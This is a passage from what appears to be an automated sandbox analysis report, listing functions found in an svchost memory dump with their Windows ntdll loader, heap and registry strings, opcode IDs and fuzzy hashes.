                                                • Instruction Fuzzy Hash: 0E923875A01268CFEB25CF19C844BA9B7B5BF45314F0A81EAD989EB390D7349E80CF51
                                                Function 03C3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: c5853ead38dd7d6f9be0b807a4534c3be05af2726b5684476bcc36cee8ed3f32
                                                • Instruction ID: 8a01517463ba27e19304a8470170bb1423d67f8b7f67b32422c087714acd8aad
                                                • Opcode Fuzzy Hash: c5853ead38dd7d6f9be0b807a4534c3be05af2726b5684476bcc36cee8ed3f32
                                                • Instruction Fuzzy Hash: A5C187791083869FDB11DF19C044B6AB7F4BF8A704F04886AF8D6CB250E735CA59CB92
                                                Function 03C6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03CA21D9, 03CA22B1
                                                • SXS: %s() passed the empty activation context, xrefs: 03CA21DE
                                                • .Local, xrefs: 03C628D8
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03CA22B6
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: fdca7f42b31faa6d844bf742c36a1554693964e4387efbb8b78418a8bde02ee3
                                                • Instruction ID: b2826c32c868836ce46a7b669e1b236e9d08e5134f462f307af6c926902610be
                                                • Opcode Fuzzy Hash: fdca7f42b31faa6d844bf742c36a1554693964e4387efbb8b78418a8bde02ee3
                                                • Instruction Fuzzy Hash: CDA1903590022A9FDB24CF65CC84BA9B3B5BF58314F1949E9D948EB251D730AE81CF90
                                                Function 03CE11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                • API String ID: 0-336120773
                                                • Opcode ID: da149042040532db2c4f608fa831f5611827f26974554decd0587d9d43eb0193
                                                • Instruction ID: 5f1bbe40d429d0cc9680e065787f1b3402d42bdfec66d537ad980fdef6b338d1
                                                • Opcode Fuzzy Hash: da149042040532db2c4f608fa831f5611827f26974554decd0587d9d43eb0193
                                                • Instruction Fuzzy Hash: F031DA76200260EFC751EB99CC86F6AB7E8EF09724F1D0055E411CF291E670FD50DA65
                                                Function 03C29148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                • API String ID: 0-1391187441
                                                • Opcode ID: e5eafaf359f0ef30b90fca86fed854e3492ec99a49106e14773ab6919dce4c8e
                                                • Instruction ID: 2b16a97c4704c4ec8cd1ff08bf83539b0091b0c20610ef4143cc539dffe71925
                                                • Opcode Fuzzy Hash: e5eafaf359f0ef30b90fca86fed854e3492ec99a49106e14773ab6919dce4c8e
                                                • Instruction Fuzzy Hash: A531C676600214EFCB11EB46CC85FDEBBB8EF45B24F154061E814EB291D770EE40DA60
                                                Function 03C40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 78a47837c847e0e564acb9056c43a6515cdfebdcf83bf62b57fe9de0461deabd
                                                • Instruction ID: e100f5f71dd4729802482125215530a71f7aa6944b1c79e0738688a54b3ef17b
                                                • Opcode Fuzzy Hash: 78a47837c847e0e564acb9056c43a6515cdfebdcf83bf62b57fe9de0461deabd
                                                • Instruction Fuzzy Hash: 77F1A735A40605DFEB25CF69C988B6AF7B5FB45300F1981A9E506DF381D730EA81CB90
                                                Function 03C3B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                • API String ID: 0-1145731471
                                                • Opcode ID: d5b35a7b40fb0bcd40e66d642715f178abfab4ffa2a12a26032e6a6574cec4f0
                                                • Instruction ID: 67316c3576ad3af2c8fb938c07dc30a641932aea88614c1fb25d343e6ccda35e
                                                • Opcode Fuzzy Hash: d5b35a7b40fb0bcd40e66d642715f178abfab4ffa2a12a26032e6a6574cec4f0
                                                • Instruction Fuzzy Hash: FAB19C7AA047849BDF25CF69C884BADB7B6EF45314F1A446AE851EB380D730ED40CB54
                                                Function 03CB368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                • API String ID: 0-2391371766
                                                • Opcode ID: cca0469bccdbac9f1ea6f3de2ce676d37f9af22542eb4f12ab82668b7ddbff29
                                                • Instruction ID: 94041acdff6d14fe0c3d5a504aaac7474ecee571b9407ffc202430004e9228ae
                                                • Opcode Fuzzy Hash: cca0469bccdbac9f1ea6f3de2ce676d37f9af22542eb4f12ab82668b7ddbff29
                                                • Instruction Fuzzy Hash: 7CB1AF7A604381AFD321DE95C884FABB7F8EB54710F150929FA40EB290D775ED44CB92
                                                Function 03C2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 4fd54bb9ed763a83541d46e30cebaf356249cce895ae621e7e4cb314a123e077
                                                • Instruction ID: 437486ede257791e510f956bc82f24a55c1816bbb80050964aeae1dedba7d6db
                                                • Opcode Fuzzy Hash: 4fd54bb9ed763a83541d46e30cebaf356249cce895ae621e7e4cb314a123e077
                                                • Instruction Fuzzy Hash: B2A16A759012299BDB21EB24CC88BEAF7B8EB44714F0541E9E909EB250DB35AFC5CF50
                                                Function 03CC36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                • API String ID: 0-318774311
                                                • Opcode ID: b8be4b79cb537342504e471993a9e6bba2f83bfbadff045e693f8a026e59a221
                                                • Instruction ID: 788c2d5aeef06ecedecd1d9d23ffc038318d47e1cd5879889e2ec6fe5b14cce8
                                                • Opcode Fuzzy Hash: b8be4b79cb537342504e471993a9e6bba2f83bfbadff045e693f8a026e59a221
                                                • Instruction Fuzzy Hash: 608198796283C0AFE311DB15D944B6AB7E8FF85750F09892DF980DB390DB38D9048B62
                                                Function 03C6909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %$&$@
                                                • API String ID: 0-1537733988
                                                • Opcode ID: 504d6c76d6aabbbf342aa9bf2200867030a521dfbed55b829e4ada3a32cec2a5
                                                • Instruction ID: 74a7dcb003fdeec920b2ab11c5ad6dd90826de3c09bfbc7d1be4758b298fea5f
                                                • Opcode Fuzzy Hash: 504d6c76d6aabbbf342aa9bf2200867030a521dfbed55b829e4ada3a32cec2a5
                                                • Instruction Fuzzy Hash: B171B1746087429FC714DF25C5C0A6BFBE9FF89618F24891DE49ACB251C731EA05CB92
                                                Function 03D0B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                Download Yara Rule
                                                Strings
                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03D0B82A
                                                • GlobalizationUserSettings, xrefs: 03D0B834
                                                • TargetNtPath, xrefs: 03D0B82F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                • API String ID: 0-505981995
                                                • Opcode ID: da5b7b499c26efec94aa2abb1684b415963fdfe8c3d64640c042de077b620766
                                                • Instruction ID: 5e95eb2bdbfca965b4935152628dfb0b949ebdfd1cdde7e6dd6101aa6cb879cf
                                                • Opcode Fuzzy Hash: da5b7b499c26efec94aa2abb1684b415963fdfe8c3d64640c042de077b620766
                                                • Instruction Fuzzy Hash: 5F617076D45229ABDB21DF54DC88BDAB7B8EF54B10F0101E6A908EB290C774DE84CF90
                                                Function 03C2F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP: , xrefs: 03C8E6B3
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03C8E6C6
                                                • HEAP[%wZ]: , xrefs: 03C8E6A6
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                • API String ID: 0-1340214556
                                                • Opcode ID: c91c2238d789c985d85c509e12a70a97de394e38dba37779c5b77e93e347eec9
                                                • Instruction ID: 951c999233127f240e245bc3bd65afc6d00cdc77fe9c00f010a36a6227a3a770
                                                • Opcode Fuzzy Hash: c91c2238d789c985d85c509e12a70a97de394e38dba37779c5b77e93e347eec9
                                                • Instruction Fuzzy Hash: A751C336604798EFD712EB68C844BAAFBF8EF05704F0900A9E951CF692D774EA50DB50
                                                Function 03C6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 03CA82DE
                                                • minkernel\ntdll\ldrinit.c, xrefs: 03CA82E8
                                                • Failed to reallocate the system dirs string !, xrefs: 03CA82D7
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                • Opcode ID: c39ae1916284f272e8d67b83b42e3bc39cd1d390205d3df38f6a7e92448940b2
                                                • Instruction ID: 78c61bcc662049bfcdbdeb0d9ef0a11cb146565d0ef5fd3c0b6a8e0dd7cee46e
                                                • Opcode Fuzzy Hash: c39ae1916284f272e8d67b83b42e3bc39cd1d390205d3df38f6a7e92448940b2
                                                • Instruction Fuzzy Hash: B94115B6500310ABC720FB28DC84B5BBBE8FF59750F05492AF988DB250E770E910DB91
                                                Function 03C616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpAllocateTls, xrefs: 03CA1B40
                                                • minkernel\ntdll\ldrtls.c, xrefs: 03CA1B4A
                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03CA1B39
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-4274184382
                                                • Opcode ID: fb29c41ec77d586e7c5ece2c834298da98c7f6e3f992240ec0c7fe47a360b6c1
                                                • Instruction ID: 7ef97095a0fa9db8470720eaf7932cbb88825973fec6e60cd8ca4d272fc351e0
                                                • Opcode Fuzzy Hash: fb29c41ec77d586e7c5ece2c834298da98c7f6e3f992240ec0c7fe47a360b6c1
                                                • Instruction Fuzzy Hash: 8541AC79A00609AFCB15DFA9D881BAEFBF5FF59714F098119E405EB300D774A900DB90
                                                Function 03CEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                • @, xrefs: 03CEC1F1
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03CEC1C5
                                                • PreferredUILanguages, xrefs: 03CEC212
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                • Opcode ID: b7a326c172865d660a2d378da5f5985c667c51a4e5e5ba0af82421c2ea68c6f9
                                                • Instruction ID: a0480f67736134208c97ac29797a3d7e9999c823cfa0305824c3019b0f3446a5
                                                • Opcode Fuzzy Hash: b7a326c172865d660a2d378da5f5985c667c51a4e5e5ba0af82421c2ea68c6f9
                                                • Instruction Fuzzy Hash: D0418D76E0020AEFDB11DAD4C885FEEB7B8AB14700F05806AE905FB290D774AA449B90
                                                Function 03CC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                • Opcode ID: cbbaa152420b5dfcbaac0e7cc0c92ca32a6b2811f0cdaefc77cec4681095eb85
                                                • Instruction ID: 6e10281a0cc84889dd7462a7e4249357277955806e16dccee929315d26c2113e
                                                • Opcode Fuzzy Hash: cbbaa152420b5dfcbaac0e7cc0c92ca32a6b2811f0cdaefc77cec4681095eb85
                                                • Instruction Fuzzy Hash: 694102759203C88BEB2ADBA6C860BADB7B8EF55340F19445ED841EF391D6359A01CB10
                                                Function 03CB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpCheckRedirection, xrefs: 03CB488F
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 03CB4899
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03CB4888
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                • Opcode ID: aee55ff02874af0fc01374a5fda4a24b9ba6d014d0833405732720e0de7ae7dc
                                                • Instruction ID: a33894e1ba7e9c23f903982c4811032c8dd2345cf374c7cb96160e770f7ac5a4
                                                • Opcode Fuzzy Hash: aee55ff02874af0fc01374a5fda4a24b9ba6d014d0833405732720e0de7ae7dc
                                                • Instruction Fuzzy Hash: 0141D7336087609FCB29CE6AD440AA6B7F9AF49650F090569EC58EB353D731DD00CB91
                                                Function 03C633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlCreateActivationContext, xrefs: 03CA29F9
                                                • Actx , xrefs: 03C633AC
                                                • SXS: %s() passed the empty activation context data, xrefs: 03CA29FE
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                • API String ID: 0-859632880
                                                • Opcode ID: b222cf6569ccf797637e902cbce818ca3ea0850945c635bb8d61d1622a5989dc
                                                • Instruction ID: 03b72a08c182bb5336ff860b89f319b9103e72624536141364251502803ffbfa
                                                • Opcode Fuzzy Hash: b222cf6569ccf797637e902cbce818ca3ea0850945c635bb8d61d1622a5989dc
                                                • Instruction Fuzzy Hash: 423144362003529FDB22DE58C8C4BAABBA4FB44714F098469EC05DF2A1CB30ED41CB90
                                                Function 03C61607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrtls.c, xrefs: 03CA1A51
                                                • LdrpInitializeTls, xrefs: 03CA1A47
                                                • DLL "%wZ" has TLS information at %p, xrefs: 03CA1A40
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-931879808
                                                • Opcode ID: 232ef4bde9ae74312ec0c00bd7998a828dfcc860c3629a13d79c6743acf75cec
                                                • Instruction ID: 8e18d4c532c18ac72847b7e34dc17a33451b7b2d9ac12bd43db9092cc4f8bb9a
                                                • Opcode Fuzzy Hash: 232ef4bde9ae74312ec0c00bd7998a828dfcc860c3629a13d79c6743acf75cec
                                                • Instruction Fuzzy Hash: 75310776A00200ABD720DB59D885F7AB7ADEB66759F0D0069F405EB280E770EE04A790
                                                Function 03C71270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                • @, xrefs: 03C712A5
                                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03C7127B
                                                • BuildLabEx, xrefs: 03C7130F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                • API String ID: 0-3051831665
                                                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                • Instruction ID: fe26cc9ad5032d75251f50edcf7d0ae56d1daffa60f2768b54bd8bc2efbd6819
                                                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                • Instruction Fuzzy Hash: 3531CD76900619AFCB11EFA5CC48EEEBBBDEB84714F054421ED14EB260DB30DA059BA0
                                                Function 03CB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                Download Yara Rule
                                                Strings
                                                • Process initialization failed with status 0x%08lx, xrefs: 03CB20F3
                                                • LdrpInitializationFailure, xrefs: 03CB20FA
                                                • minkernel\ntdll\ldrinit.c, xrefs: 03CB2104
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: 9142230e8e5035fdb776e2b0f8f9e75cbc49eb9074c6a45e4d90a383e1932fb0
                                                • Instruction ID: 5c0f2f6bc7b6f7ce4dad8e31f31dd53dd44d5ff83605bc2ee087e4196543a361
                                                • Opcode Fuzzy Hash: 9142230e8e5035fdb776e2b0f8f9e75cbc49eb9074c6a45e4d90a383e1932fb0
                                                • Instruction Fuzzy Hash: E8F0283A640308BFEB24E60CDC02FD97768EB41B04F050464FA00EF281D2F0AA10EA90
                                                Function 03C403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                • Opcode ID: 95eecad1a41a9a1ebbb41433d499da2e898ac58b150ce1197c8b56c08c1a7ec1
                                                • Instruction ID: 1456d5bfc5b60d24ea47eff171b325440adcc5cda252498e2d8795ea1696fea7
                                                • Opcode Fuzzy Hash: 95eecad1a41a9a1ebbb41433d499da2e898ac58b150ce1197c8b56c08c1a7ec1
                                                • Instruction Fuzzy Hash: 06715B76A002499FDB05DFA9D994BAEB7B8FF48304F164065E901EB251EB34EE01DB60
                                                Function 03CD705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: kLsE
                                                • API String ID: 3446177414-3058123920
                                                • Opcode ID: e885cc6177feb6670a86f22e2459c7cb879a7008162c6773e95421973d44ab0e
                                                • Instruction ID: c6828853ad4a863a26bf1e63059b071ed2fecf56155baf851f426090f482c5f6
                                                • Opcode Fuzzy Hash: e885cc6177feb6670a86f22e2459c7cb879a7008162c6773e95421973d44ab0e
                                                • Instruction Fuzzy Hash: 8A4187735013504AE731FF65E884B69BBA4AB30B24F190258FEA0CF2C9CBB09585D7A0
                                                Function 03C452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@
                                                • API String ID: 0-149943524
                                                • Opcode ID: 2d6d0801389f9bf6ba9d1fd230e915b8deede90f359de03dbd4ffc867d1c4450
                                                • Instruction ID: f0d83d79cfc8e0eb2c83ab1de05bf49b89b4d2a5a44e631d345cf3cb4450851f
                                                • Opcode Fuzzy Hash: 2d6d0801389f9bf6ba9d1fd230e915b8deede90f359de03dbd4ffc867d1c4450
                                                • Instruction Fuzzy Hash: A932A8755083118BDB24CF19C484B7EF7E1AF8A750F19492EF986DB290E734CA94CB92
                                                Function 03CFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction ID: f859c663c0bb734eb4a3c39f6d9b6671c0174392a7544de40434cd290343a0fd
                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction Fuzzy Hash: D9C1DE352047429FDB64CF29C845B6BFBE5AF84318F084A2DFA99CA290D774D645CF81
                                                Function 03CAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 3eef02902b89abdd4aa05481f1817978472cc411fb3d355d4c4e419edb8f570e
                                                • Instruction ID: 2fb2911126f5376dd9212d302047102411fd69b9a09ad4bae3dc3301d33cd93d
                                                • Opcode Fuzzy Hash: 3eef02902b89abdd4aa05481f1817978472cc411fb3d355d4c4e419edb8f570e
                                                • Instruction Fuzzy Hash: BC614C72E00B199FDB24DFBDC880BADBBB9FB44704F144069E559EB291D731A940DB90
                                                Function 03C4F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$$
                                                • API String ID: 0-233714265
                                                • Opcode ID: 57f136ceaa6c47729ecb5341f8fd0cc98e8b59133d966ad06c975cb988da8c20
                                                • Instruction ID: 6dc7c6dff11edded79869eb8bde08c034dfebceef0fe6be928d2d5b73bab5425
                                                • Opcode Fuzzy Hash: 57f136ceaa6c47729ecb5341f8fd0cc98e8b59133d966ad06c975cb988da8c20
